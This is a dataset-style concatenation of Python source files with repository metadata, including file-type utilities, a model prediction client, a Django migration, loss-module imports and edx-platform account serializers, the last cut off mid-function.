Return the cumulative number of files in the directory tree at `location`
    or 1 if `location` is a file. Only regular files are counted. Everything
    else has a zero count.
"""
return counter(location, 'file_count')
def get_size(location):
"""
Return the size in bytes of a file at `location` or if `location` is a
directory, the cumulative size of all files in this directory tree. Only
regular files have a size. Everything else has a zero size.
"""
return counter(location, 'file_size')
| 29.469027
| 86
| 0.666066
|
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/commoncode for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import os
from datetime import datetime
from commoncode.system import on_posix
from commoncode.functional import memoize
"""
Low level file type utilities, essentially a wrapper around os.path and stat.
"""
def is_link(location):
"""
Return True if `location` is a symbolic link.
"""
return location and os.path.islink(location)
def is_file(location, follow_symlinks=False):
"""
Return True if `location` is a file.
"""
_is_file = location and os.path.isfile(location)
if follow_symlinks:
return _is_file
return _is_file and not is_link(location) and not is_broken_link(location)
def is_dir(location, follow_symlinks=False):
"""
Return True if `location` is a directory.
"""
_is_dir = location and os.path.isdir(location) and not is_file(location)
if follow_symlinks:
return _is_dir
return _is_dir and not is_link(location) and not is_broken_link(location)
def is_regular(location):
"""
Return True if `location` is regular. A regular location is a file or a
dir and not a special file or symlink.
"""
return location and (is_file(location) or is_dir(location))
def is_special(location):
"""
    Return True if `location` is a special file. A special file is not a
regular file, i.e. anything such as a broken link, block file, fifo,
socket, character device or else.
"""
return not is_regular(location)
def is_broken_link(location):
"""
Return True if `location` is a broken link.
"""
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
target = get_link_target(location)
target_loc = os.path.join(os.path.dirname(location), target)
return target and not os.path.exists(target_loc)
def get_link_target(location):
"""
    Return the link target for `location` if it is a link, or an empty
    string otherwise.
"""
target = ''
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
try:
# return false on OSes not supporting links
target = os.readlink(location)
except UnicodeEncodeError:
# location is unicode but readlink can fail in some cases
pass
return target
# Map of type checker function -> short type code
# The order of type checks matters: link -> file -> directory -> special
TYPES = dict([
(is_link, ('l', 'link',)),
(is_file, ('f', 'file',)),
(is_dir, ('d', 'directory',)),
(is_special, ('s', 'special',))
])
def get_type(location, short=True):
"""
Return the type of the `location` or None if it does not exist.
Return the short form (single character) or long form if short=False
"""
if location:
for type_checker in TYPES:
tc = type_checker(location)
if tc:
short_form, long_form = TYPES[type_checker]
return short and short_form or long_form
def is_readable(location):
"""
Return True if the file at location has readable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.X_OK)
else:
return os.access(location, os.R_OK)
def is_writable(location):
"""
Return True if the file at location has writeable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.R_OK | os.W_OK)
def is_executable(location):
"""
Return True if the file at location has executable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.X_OK)
def is_rwx(location):
"""
Return True if the file at location has read, write and executable
permission set. Does not follow links.
"""
return is_readable(location) and is_writable(location) and is_executable(location)
def get_last_modified_date(location):
"""
    Return the last modified date stamp of a file in YYYY-MM-DD format. The date
of non-files (dir, links, special) is always an empty string.
"""
yyyymmdd = ''
if is_file(location):
utc_date = datetime.isoformat(
datetime.utcfromtimestamp(os.path.getmtime(location))
)
yyyymmdd = utc_date[:10]
return yyyymmdd
counting_functions = {
'file_count': lambda _: 1,
'file_size': os.path.getsize,
}
@memoize
def counter(location, counting_function):
"""
Return a count for a single file or a cumulative count for a directory
tree at `location`.
Get a callable from the counting_functions registry using the
`counting_function` string. Call this callable with a `location` argument
to determine the count value for a single file. This allow memoization
with hashable arguments.
Only regular files and directories have a count. The count for a directory
is the recursive count sum of the directory file and directory
descendants.
Any other file type such as a special file or link has a zero size. Does
not follow links.
"""
if not (is_file(location) or is_dir(location)):
return 0
count = 0
if is_file(location):
count_fun = counting_functions[counting_function]
return count_fun(location)
elif is_dir(location):
count += sum(counter(os.path.join(location, p), counting_function)
for p in os.listdir(location))
return count
def get_file_count(location):
"""
Return the cumulative number of files in the directory tree at `location`
    or 1 if `location` is a file. Only regular files are counted. Everything
    else has a zero count.
"""
return counter(location, 'file_count')
def get_size(location):
"""
Return the size in bytes of a file at `location` or if `location` is a
directory, the cumulative size of all files in this directory tree. Only
regular files have a size. Everything else has a zero size.
"""
return counter(location, 'file_size')
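counter() is memoized so repeated traversals of the same location are answered from a cache. Below is a standalone sketch of the same idea, with functools.lru_cache standing in for commoncode's @memoize (an assumption; the real decorator lives in commoncode.functional) and the function name chosen for illustration.
from functools import lru_cache
import os

@lru_cache(maxsize=None)
def cached_tree_size(location):
    # Size of a regular file, or the recursive size of a directory tree; links and
    # special files count as zero, mirroring the counter()/get_size() behaviour above.
    if os.path.isfile(location) and not os.path.islink(location):
        return os.path.getsize(location)
    if os.path.isdir(location) and not os.path.islink(location):
        return sum(cached_tree_size(os.path.join(location, p)) for p in os.listdir(location))
    return 0

print(cached_tree_size('.'))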
| 0
| 1,031
| 0
| 0
| 0
| 0
| 0
| 20
| 45
|
05aeadad29492f4792dc64b4e5f1e4699b3a1866
| 1,522
|
py
|
Python
|
object_detection/serving_script/predict.py
|
qq2016/kubeflow_learning
|
930706686108f997aab42ccf2fe455dcf09a4afc
|
[
"Apache-2.0"
] | 1,165
|
2018-03-01T01:47:14.000Z
|
2022-03-31T08:35:00.000Z
|
object_detection/serving_script/predict.py
|
arki1/examples
|
c93b792d67c8c52bc91d4ccf5fbaead4e2324331
|
[
"Apache-2.0"
] | 929
|
2018-02-04T18:20:16.000Z
|
2022-03-31T18:20:43.000Z
|
object_detection/serving_script/predict.py
|
arki1/examples
|
c93b792d67c8c52bc91d4ccf5fbaead4e2324331
|
[
"Apache-2.0"
] | 687
|
2018-02-01T21:35:30.000Z
|
2022-03-29T07:47:47.000Z
|
""" Script to send prediction request.
Usage:
python predict.py --url=YOUR_KF_HOST/models/coco --input_image=YOUR_LOCAL_IMAGE
--output_image=OUTPUT_IMAGE_NAME.
This will save the prediction result as OUTPUT_IMAGE_NAME.
The output image is the input image with the detected bounding boxes.
"""
WIDTH = 1024
HEIGHT = 768
if __name__ == '__main__':
main()
| 27.178571
| 81
| 0.729304
|
""" Script to send prediction request.
Usage:
python predict.py --url=YOUR_KF_HOST/models/coco --input_image=YOUR_LOCAL_IMAGE
--output_image=OUTPUT_IMAGE_NAME.
This will save the prediction result as OUTPUT_IMAGE_NAME.
The output image is the input image with the detected bounding boxes.
"""
import argparse
import json
import requests
import numpy as np
from PIL import Image
import visualization_utils as vis_util
WIDTH = 1024
HEIGHT = 768
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--url", help='The url to send the request')
parser.add_argument("--input_image", default='image1.jpg')
parser.add_argument("--output_image", default='output.jpg')
args = parser.parse_args()
img = Image.open(args.input_image)
img = img.resize((WIDTH, HEIGHT), Image.ANTIALIAS)
img_np = np.array(img)
res = requests.post(
args.url,
data=json.dumps({"instances": [{"inputs": img_np.tolist()}]}))
if res.status_code != 200:
print('Failed: {}'.format(res.text))
return
output_dict = json.loads(res.text).get('predictions')[0]
vis_util.visualize_boxes_and_labels_on_image_array(
img_np,
np.array(output_dict['detection_boxes']),
map(int, output_dict['detection_classes']),
output_dict['detection_scores'],
{},
instance_masks=output_dict.get('detection_masks'),
use_normalized_coordinates=True,
line_thickness=8)
output_image = Image.fromarray(img_np)
output_image.save(args.output_image)
if __name__ == '__main__':
main()
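The script builds a TensorFlow Serving style REST body: a JSON object with an "instances" list, each instance carrying the image as a nested list under "inputs". A minimal sketch of just that payload round-trip, using a tiny zero image and a made-up response shape instead of a live endpoint:
import json
import numpy as np

fake_img = np.zeros((4, 4, 3), dtype=np.uint8)            # tiny stand-in for the resized image
payload = json.dumps({"instances": [{"inputs": fake_img.tolist()}]})
print(payload[:80])                                        # the body that requests.post() would send
parsed = {"predictions": [{"detection_scores": [0.9]}]}    # shape of a typical (made-up) response
print(parsed["predictions"][0]["detection_scores"])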
| 0
| 0
| 0
| 0
| 0
| 1,009
| 0
| -8
| 156
|
835a69e7ee6ae96c62b6be6b24e176d61f9beb24
| 151
|
py
|
Python
|
src/polls/tests/functional_tests.py
|
ikos289/docker-django
|
6fa50df751e357b82b686d15b16891210e506430
|
[
"MIT"
] | null | null | null |
src/polls/tests/functional_tests.py
|
ikos289/docker-django
|
6fa50df751e357b82b686d15b16891210e506430
|
[
"MIT"
] | null | null | null |
src/polls/tests/functional_tests.py
|
ikos289/docker-django
|
6fa50df751e357b82b686d15b16891210e506430
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
browser = webdriver.Firefox()
browser.get('http://0.0.0.0:8000')
print(browser.title)
assert 'Django' in browser.title
| 21.571429
| 34
| 0.761589
|
from selenium import webdriver
browser = webdriver.Firefox()
browser.get('http://0.0.0.0:8000')
print(browser.title)
assert 'Django' in browser.title
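The test above asserts on the title immediately after the request and leaves the browser open. A slightly more defensive variant (a sketch, not part of the original file) waits for the title explicitly and always quits the driver; host and port are taken from the snippet above.
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait

browser = webdriver.Firefox()
try:
    browser.get('http://0.0.0.0:8000')
    # Wait up to 10 seconds for the title instead of asserting right away.
    WebDriverWait(browser, 10).until(lambda drv: 'Django' in drv.title)
    print(browser.title)
finally:
    browser.quit()   # always release the browser, even if the wait times out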
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
a72428b374da27389d79bf99ef277a86b1fa5dd6
| 509
|
py
|
Python
|
src/olympia/stats/migrations/0005_create_switch_bigquery_download_stats_cron_tasks.py
|
shashwatsingh/addons-server
|
8fce98901104349055a828b5a47865f5e8f4120b
|
[
"BSD-3-Clause"
] | 843
|
2016-02-09T13:00:37.000Z
|
2022-03-20T19:17:06.000Z
|
src/olympia/stats/migrations/0005_create_switch_bigquery_download_stats_cron_tasks.py
|
shashwatsingh/addons-server
|
8fce98901104349055a828b5a47865f5e8f4120b
|
[
"BSD-3-Clause"
] | 10,187
|
2016-02-05T23:51:05.000Z
|
2022-03-31T15:24:44.000Z
|
src/olympia/stats/migrations/0005_create_switch_bigquery_download_stats_cron_tasks.py
|
shashwatsingh/addons-server
|
8fce98901104349055a828b5a47865f5e8f4120b
|
[
"BSD-3-Clause"
] | 551
|
2016-02-08T20:32:16.000Z
|
2022-03-15T16:49:24.000Z
|
# Generated by Django 2.2.13 on 2020-07-23 16:13
| 25.45
| 61
| 0.707269
|
# Generated by Django 2.2.13 on 2020-07-23 16:13
from django.db import migrations
def create_waffle_switch(apps, schema_editor):
Switch = apps.get_model('waffle', 'Switch')
Switch.objects.create(
name='use-bigquery-for-download-stats-cron',
active=False,
note='Use BigQuery in download stats cron tasks',
)
class Migration(migrations.Migration):
dependencies = [('stats', '0004_delete_updatecount')]
operations = [migrations.RunPython(create_waffle_switch)]
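RunPython accepts an optional reverse function, so the switch can be removed again when the migration is rolled back. A sketch of what that could look like here; delete_waffle_switch is an addition for illustration, not part of the original migration.
def delete_waffle_switch(apps, schema_editor):
    # Reverse of create_waffle_switch: drop the switch so the rollback is clean.
    Switch = apps.get_model('waffle', 'Switch')
    Switch.objects.filter(name='use-bigquery-for-download-stats-cron').delete()

# operations = [migrations.RunPython(create_waffle_switch, delete_waffle_switch)]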
| 0
| 0
| 0
| 139
| 0
| 239
| 0
| 11
| 69
|
800e3537aea3f08140b4b85867fd724bf0b52669
| 1,055
|
py
|
Python
|
mmaction/models/losses/__init__.py
|
ovshake/mmaction2
|
71e92e9d4c28190d485ba153aae5200bf71f70b1
|
[
"Apache-2.0"
] | null | null | null |
mmaction/models/losses/__init__.py
|
ovshake/mmaction2
|
71e92e9d4c28190d485ba153aae5200bf71f70b1
|
[
"Apache-2.0"
] | null | null | null |
mmaction/models/losses/__init__.py
|
ovshake/mmaction2
|
71e92e9d4c28190d485ba153aae5200bf71f70b1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) OpenMMLab. All rights reserved.
from .base import BaseWeightedLoss
from .binary_logistic_regression_loss import BinaryLogisticRegressionLoss
from .bmn_loss import BMNLoss
from .cross_entropy_loss import BCELossWithLogits, CrossEntropyLoss
from .hvu_loss import HVULoss
from .nll_loss import NLLLoss
from .ohem_hinge_loss import OHEMHingeLoss
from .ssn_loss import SSNLoss
from .slowfast_selfsupervised_loss import SlowFastSelfSupervisedLoss, ContrastiveLoss, SingleInstanceContrastiveLoss, SingleInstanceContrastiveLossv2
from .multiple_contrastive_loss import MultipleContrastiveLoss, MultipleContrastiveSingleInstanceLoss
from .moco_loss import MocoLoss
__all__ = [
'BaseWeightedLoss', 'CrossEntropyLoss', 'NLLLoss', 'BCELossWithLogits',
'BinaryLogisticRegressionLoss', 'BMNLoss', 'OHEMHingeLoss', 'SSNLoss',
'HVULoss', 'SlowFastSelfSupervisedLoss', 'MultipleContrastiveLoss',
'ContrastiveLoss', 'MocoLoss', 'SingleInstanceContrastiveLoss', 'MultipleContrastiveSingleInstanceLoss', 'SingleInstanceContrastiveLossv2'
]
| 50.238095
| 149
| 0.842654
|
# Copyright (c) OpenMMLab. All rights reserved.
from .base import BaseWeightedLoss
from .binary_logistic_regression_loss import BinaryLogisticRegressionLoss
from .bmn_loss import BMNLoss
from .cross_entropy_loss import BCELossWithLogits, CrossEntropyLoss
from .hvu_loss import HVULoss
from .nll_loss import NLLLoss
from .ohem_hinge_loss import OHEMHingeLoss
from .ssn_loss import SSNLoss
from .slowfast_selfsupervised_loss import SlowFastSelfSupervisedLoss, ContrastiveLoss, SingleInstanceContrastiveLoss, SingleInstanceContrastiveLossv2
from .multiple_contrastive_loss import MultipleContrastiveLoss, MultipleContrastiveSingleInstanceLoss
from .moco_loss import MocoLoss
__all__ = [
'BaseWeightedLoss', 'CrossEntropyLoss', 'NLLLoss', 'BCELossWithLogits',
'BinaryLogisticRegressionLoss', 'BMNLoss', 'OHEMHingeLoss', 'SSNLoss',
'HVULoss', 'SlowFastSelfSupervisedLoss', 'MultipleContrastiveLoss',
'ContrastiveLoss', 'MocoLoss', 'SingleInstanceContrastiveLoss', 'MultipleContrastiveSingleInstanceLoss', 'SingleInstanceContrastiveLossv2'
]
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
77e0586d04fc6b5bd498ff7eda396fdc0f889dc1
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/poetry/utils/password_manager.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/poetry/utils/password_manager.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/poetry/utils/password_manager.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/3a/e8/d9/6b866f26f3d0047a518cb59b619be509f29a97d30cbaa9657343abd771
| 96
| 96
| 0.895833
|
/home/runner/.cache/pip/pool/3a/e8/d9/6b866f26f3d0047a518cb59b619be509f29a97d30cbaa9657343abd771
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
b7060bcb1857418d2ea9deaaa1621e5bdb64a900
| 25,094
|
py
|
Python
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/user_api/accounts/serializers.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 3
|
2021-12-15T04:58:18.000Z
|
2022-02-06T12:15:37.000Z
|
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/user_api/accounts/serializers.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | null | null | null |
Part-03-Understanding-Software-Crafting-Your-Own-Tools/models/edx-platform/openedx/core/djangoapps/user_api/accounts/serializers.py
|
osoco/better-ways-of-thinking-about-software
|
83e70d23c873509e22362a09a10d3510e10f6992
|
[
"MIT"
] | 1
|
2019-01-02T14:38:50.000Z
|
2019-01-02T14:38:50.000Z
|
"""
Django REST Framework serializers for the User API Accounts sub-application
"""
import json
import logging
from django.conf import settings
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.user_api.models import UserPreference
from . import (ACCOUNT_VISIBILITY_PREF_KEY, ALL_USERS_VISIBILITY, CUSTOM_VISIBILITY, PRIVATE_VISIBILITY, VISIBILITY_PREFIX)
PROFILE_IMAGE_KEY_PREFIX = 'image_url'
LOGGER = logging.getLogger(__name__)
def get_extended_profile(user_profile):
"""
Returns the extended user profile fields stored in user_profile.meta
"""
# pick the keys from the site configuration
extended_profile_field_names = configuration_helpers.get_value('extended_profile_fields', [])
try:
extended_profile_fields_data = json.loads(user_profile.meta)
except ValueError:
extended_profile_fields_data = {}
extended_profile = []
for field_name in extended_profile_field_names:
extended_profile.append({
"field_name": field_name,
"field_value": extended_profile_fields_data.get(field_name, "")
})
return extended_profile
def get_profile_visibility(user_profile, user, configuration):
"""
Returns the visibility level for the specified user profile.
"""
if user_profile.requires_parental_consent():
return PRIVATE_VISIBILITY
# Calling UserPreference directly because the requesting user may be different from existing_user
# (and does not have to be is_staff).
profile_privacy = UserPreference.get_value(user, ACCOUNT_VISIBILITY_PREF_KEY)
if profile_privacy:
return profile_privacy
else:
return configuration.get('default_visibility')
def _visible_fields(user_profile, user, configuration=None):
"""
Return what fields should be visible based on user's preferences
:param user_profile: User profile object
:param user: User object
:param configuration: A visibility configuration dictionary.
:return: whitelist List of fields to be shown
"""
if not configuration:
configuration = settings.ACCOUNT_VISIBILITY_CONFIGURATION
profile_visibility = get_profile_visibility(user_profile, user, configuration)
if profile_visibility == ALL_USERS_VISIBILITY:
return configuration.get('bulk_shareable_fields')
elif profile_visibility == CUSTOM_VISIBILITY:
return _visible_fields_from_custom_preferences(user, configuration)
else:
return configuration.get('public_fields')
def _visible_fields_from_custom_preferences(user, configuration):
"""
Returns all fields that are marked to be shared with other users in the
given user's preferences. Includes fields that are always public.
"""
preferences = UserPreference.get_all_preferences(user)
fields_shared_with_all_users = [
field_name for field_name in configuration.get('custom_shareable_fields')
if preferences.get(f'{VISIBILITY_PREFIX}{field_name}') == 'all_users'
]
return set(fields_shared_with_all_users + configuration.get('public_fields'))
| 39.64297
| 124
| 0.676895
|
"""
Django REST Framework serializers for the User API Accounts sub-application
"""
import json
import logging
import re
from django.conf import settings
from django.contrib.auth.models import User # lint-amnesty, pylint: disable=imported-auth-user
from django.core.exceptions import ObjectDoesNotExist
from django.urls import reverse
from rest_framework import serializers
from edx_name_affirmation.toggles import is_verified_name_enabled
from common.djangoapps.student.models import (
LanguageProficiency,
PendingNameChange,
SocialLink,
UserPasswordToggleHistory,
UserProfile
)
from lms.djangoapps.badges.utils import badges_enabled
from openedx.core.djangoapps.site_configuration import helpers as configuration_helpers
from openedx.core.djangoapps.user_api import errors
from openedx.core.djangoapps.user_api.accounts.utils import is_secondary_email_feature_enabled
from openedx.core.djangoapps.user_api.models import RetirementState, UserPreference, UserRetirementStatus
from openedx.core.djangoapps.user_api.serializers import ReadOnlyFieldsSerializerMixin
from openedx.core.djangoapps.user_authn.views.registration_form import contains_html, contains_url
from . import (
ACCOUNT_VISIBILITY_PREF_KEY,
ALL_USERS_VISIBILITY,
BIO_MAX_LENGTH,
CUSTOM_VISIBILITY,
NAME_MIN_LENGTH,
PRIVATE_VISIBILITY,
VISIBILITY_PREFIX
)
from .image_helpers import get_profile_image_urls_for_user
from .utils import format_social_link, validate_social_link
PROFILE_IMAGE_KEY_PREFIX = 'image_url'
LOGGER = logging.getLogger(__name__)
class PhoneNumberSerializer(serializers.BaseSerializer): # lint-amnesty, pylint: disable=abstract-method
"""
Class to serialize phone number into a digit only representation
"""
def to_internal_value(self, data):
"""Remove all non numeric characters in phone number"""
return re.sub("[^0-9]", "", data) or None
class LanguageProficiencySerializer(serializers.ModelSerializer):
"""
Class that serializes the LanguageProficiency model for account
information.
"""
class Meta:
model = LanguageProficiency
fields = ("code",)
def get_identity(self, data):
"""
This is used in bulk updates to determine the identity of an object.
The default is to use the id of an object, but we want to override that
and consider the language code to be the canonical identity of a
LanguageProficiency model.
"""
try:
return data.get('code', None)
except AttributeError:
return None
class SocialLinkSerializer(serializers.ModelSerializer):
"""
Class that serializes the SocialLink model for the UserProfile object.
"""
class Meta:
model = SocialLink
fields = ("platform", "social_link")
def validate_platform(self, platform):
"""
Validate that the platform value is one of (facebook, twitter or linkedin)
"""
valid_platforms = ["facebook", "twitter", "linkedin"]
if platform not in valid_platforms:
raise serializers.ValidationError(
"The social platform must be facebook, twitter or linkedin"
)
return platform
class UserReadOnlySerializer(serializers.Serializer): # lint-amnesty, pylint: disable=abstract-method
"""
Class that serializes the User model and UserProfile model together.
"""
def __init__(self, *args, **kwargs):
# Don't pass the 'configuration' arg up to the superclass
self.configuration = kwargs.pop('configuration', None)
if not self.configuration:
self.configuration = settings.ACCOUNT_VISIBILITY_CONFIGURATION
# Don't pass the 'custom_fields' arg up to the superclass
self.custom_fields = kwargs.pop('custom_fields', [])
super().__init__(*args, **kwargs)
def to_representation(self, user): # lint-amnesty, pylint: disable=arguments-differ
"""
Overwrite to_native to handle custom logic since we are serializing three models as one here
:param user: User object
:return: Dict serialized account
"""
try:
user_profile = user.profile
except ObjectDoesNotExist:
user_profile = None
LOGGER.warning("user profile for the user [%s] does not exist", user.username)
try:
account_recovery = user.account_recovery
except ObjectDoesNotExist:
account_recovery = None
try:
activation_key = user.registration.activation_key
except ObjectDoesNotExist:
activation_key = None
accomplishments_shared = badges_enabled()
data = {
"username": user.username,
"url": self.context.get('request').build_absolute_uri(
reverse('accounts_api', kwargs={'username': user.username})
),
"email": user.email,
"id": user.id,
# For backwards compatibility: Tables created after the upgrade to Django 1.8 will save microseconds.
# However, mobile apps are not expecting microsecond in the serialized value. If we set it to zero the
# DRF JSONEncoder will not include it in the serialized value.
# https://docs.djangoproject.com/en/1.8/ref/databases/#fractional-seconds-support-for-time-and-datetime-fields
"date_joined": user.date_joined.replace(microsecond=0),
"last_login": user.last_login,
"is_active": user.is_active,
"activation_key": activation_key,
"bio": None,
"country": None,
"state": None,
"profile_image": None,
"language_proficiencies": None,
"name": None,
"gender": None,
"goals": None,
"year_of_birth": None,
"level_of_education": None,
"mailing_address": None,
"requires_parental_consent": None,
"accomplishments_shared": accomplishments_shared,
"account_privacy": self.configuration.get('default_visibility'),
"social_links": None,
"extended_profile_fields": None,
"phone_number": None,
"pending_name_change": None,
"is_verified_name_enabled": is_verified_name_enabled(),
}
if user_profile:
data.update(
{
"bio": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.bio),
"country": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.country.code),
"state": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.state),
"profile_image": AccountLegacyProfileSerializer.get_profile_image(
user_profile, user, self.context.get('request')
),
"language_proficiencies": LanguageProficiencySerializer(
user_profile.language_proficiencies.all().order_by('code'), many=True
).data,
"name": user_profile.name,
"gender": AccountLegacyProfileSerializer.convert_empty_to_None(user_profile.gender),
"goals": user_profile.goals,
"year_of_birth": user_profile.year_of_birth,
"level_of_education": AccountLegacyProfileSerializer.convert_empty_to_None(
user_profile.level_of_education
),
"mailing_address": user_profile.mailing_address,
"requires_parental_consent": user_profile.requires_parental_consent(),
"account_privacy": get_profile_visibility(user_profile, user, self.configuration),
"social_links": SocialLinkSerializer(
user_profile.social_links.all().order_by('platform'), many=True
).data,
"extended_profile": get_extended_profile(user_profile),
"phone_number": user_profile.phone_number,
}
)
try:
pending_name_change = PendingNameChange.objects.get(user=user)
data.update({"pending_name_change": pending_name_change.new_name})
except PendingNameChange.DoesNotExist:
pass
if is_secondary_email_feature_enabled():
data.update(
{
"secondary_email": account_recovery.secondary_email if account_recovery else None,
"secondary_email_enabled": True,
}
)
if self.custom_fields:
fields = self.custom_fields
elif user_profile:
fields = _visible_fields(user_profile, user, self.configuration)
else:
fields = self.configuration.get('public_fields')
return self._filter_fields(
fields,
data
)
def _filter_fields(self, field_whitelist, serialized_account):
"""
Filter serialized account Dict to only include whitelisted keys
"""
visible_serialized_account = {}
for field_name in field_whitelist:
visible_serialized_account[field_name] = serialized_account.get(field_name, None)
return visible_serialized_account
class UserAccountDisableHistorySerializer(serializers.ModelSerializer):
"""
Class that serializes User account disable history
"""
created_by = serializers.SerializerMethodField()
class Meta:
model = UserPasswordToggleHistory
fields = ("created", "comment", "disabled", "created_by")
def get_created_by(self, user_password_toggle_history):
return user_password_toggle_history.created_by.username
class AccountUserSerializer(serializers.HyperlinkedModelSerializer, ReadOnlyFieldsSerializerMixin):
"""
Class that serializes the portion of User model needed for account information.
"""
password_toggle_history = UserAccountDisableHistorySerializer(many=True, required=False)
class Meta:
model = User
fields = ("username", "email", "date_joined", "is_active", "password_toggle_history")
read_only_fields = fields
explicit_read_only_fields = ()
class AccountLegacyProfileSerializer(serializers.HyperlinkedModelSerializer, ReadOnlyFieldsSerializerMixin):
"""
Class that serializes the portion of UserProfile model needed for account information.
"""
profile_image = serializers.SerializerMethodField("_get_profile_image")
requires_parental_consent = serializers.SerializerMethodField()
language_proficiencies = LanguageProficiencySerializer(many=True, required=False)
social_links = SocialLinkSerializer(many=True, required=False)
phone_number = PhoneNumberSerializer(required=False)
class Meta:
model = UserProfile
fields = (
"name", "gender", "goals", "year_of_birth", "level_of_education", "country", "state", "social_links",
"mailing_address", "bio", "profile_image", "requires_parental_consent", "language_proficiencies",
"phone_number"
)
# Currently no read-only field, but keep this so view code doesn't need to know.
read_only_fields = ()
explicit_read_only_fields = ("profile_image", "requires_parental_consent")
def validate_bio(self, new_bio):
""" Enforce maximum length for bio. """
if len(new_bio) > BIO_MAX_LENGTH:
raise serializers.ValidationError(
f"The about me field must be at most {BIO_MAX_LENGTH} characters long."
)
return new_bio
def validate_name(self, new_name):
""" Enforce minimum length for name. """
if len(new_name) < NAME_MIN_LENGTH:
raise serializers.ValidationError(
f"The name field must be at least {NAME_MIN_LENGTH} character long."
)
return new_name
def validate_language_proficiencies(self, value):
"""
Enforce all languages are unique.
"""
language_proficiencies = [language for language in value] # lint-amnesty, pylint: disable=unnecessary-comprehension
unique_language_proficiencies = {language["code"] for language in language_proficiencies}
if len(language_proficiencies) != len(unique_language_proficiencies):
raise serializers.ValidationError("The language_proficiencies field must consist of unique languages.")
return value
def validate_social_links(self, value):
"""
Enforce only one entry for a particular social platform.
"""
social_links = [social_link for social_link in value] # lint-amnesty, pylint: disable=unnecessary-comprehension
unique_social_links = {social_link["platform"] for social_link in social_links}
if len(social_links) != len(unique_social_links):
raise serializers.ValidationError("The social_links field must consist of unique social platforms.")
return value
def transform_gender(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_country(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_level_of_education(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_bio(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
def transform_phone_number(self, user_profile, value): # pylint: disable=unused-argument
"""
Converts empty string to None, to indicate not set. Replaced by to_representation in version 3.
"""
return AccountLegacyProfileSerializer.convert_empty_to_None(value)
@staticmethod
def convert_empty_to_None(value):
"""
Helper method to convert empty string to None (other values pass through).
"""
return None if value == "" else value
@staticmethod
def get_profile_image(user_profile, user, request=None):
"""
Returns metadata about a user's profile image.
"""
data = {'has_image': user_profile.has_profile_image}
urls = get_profile_image_urls_for_user(user, request)
data.update({
f'{PROFILE_IMAGE_KEY_PREFIX}_{size_display_name}': url
for size_display_name, url in urls.items()
})
return data
def get_requires_parental_consent(self, user_profile):
"""
Returns a boolean representing whether the user requires parental controls.
"""
return user_profile.requires_parental_consent()
def _get_profile_image(self, user_profile):
"""
Returns metadata about a user's profile image
This protected method delegates to the static 'get_profile_image' method
because 'serializers.SerializerMethodField("_get_profile_image")' will
call the method with a single argument, the user_profile object.
"""
return AccountLegacyProfileSerializer.get_profile_image(user_profile, user_profile.user)
def _update_social_links(self, instance, requested_social_links):
"""
Update the given profile instance's social links as requested.
"""
try:
new_social_links = []
deleted_social_platforms = []
for requested_link_data in requested_social_links:
requested_platform = requested_link_data['platform']
requested_link_url = requested_link_data['social_link']
validate_social_link(requested_platform, requested_link_url)
formatted_link = format_social_link(requested_platform, requested_link_url)
if not formatted_link:
deleted_social_platforms.append(requested_platform)
else:
new_social_links.append(
SocialLink(user_profile=instance, platform=requested_platform, social_link=formatted_link)
)
platforms_of_new_social_links = [s.platform for s in new_social_links]
current_social_links = list(instance.social_links.all())
unreplaced_social_links = [
social_link for social_link in current_social_links
if social_link.platform not in platforms_of_new_social_links
]
pruned_unreplaced_social_links = [
social_link for social_link in unreplaced_social_links
if social_link.platform not in deleted_social_platforms
]
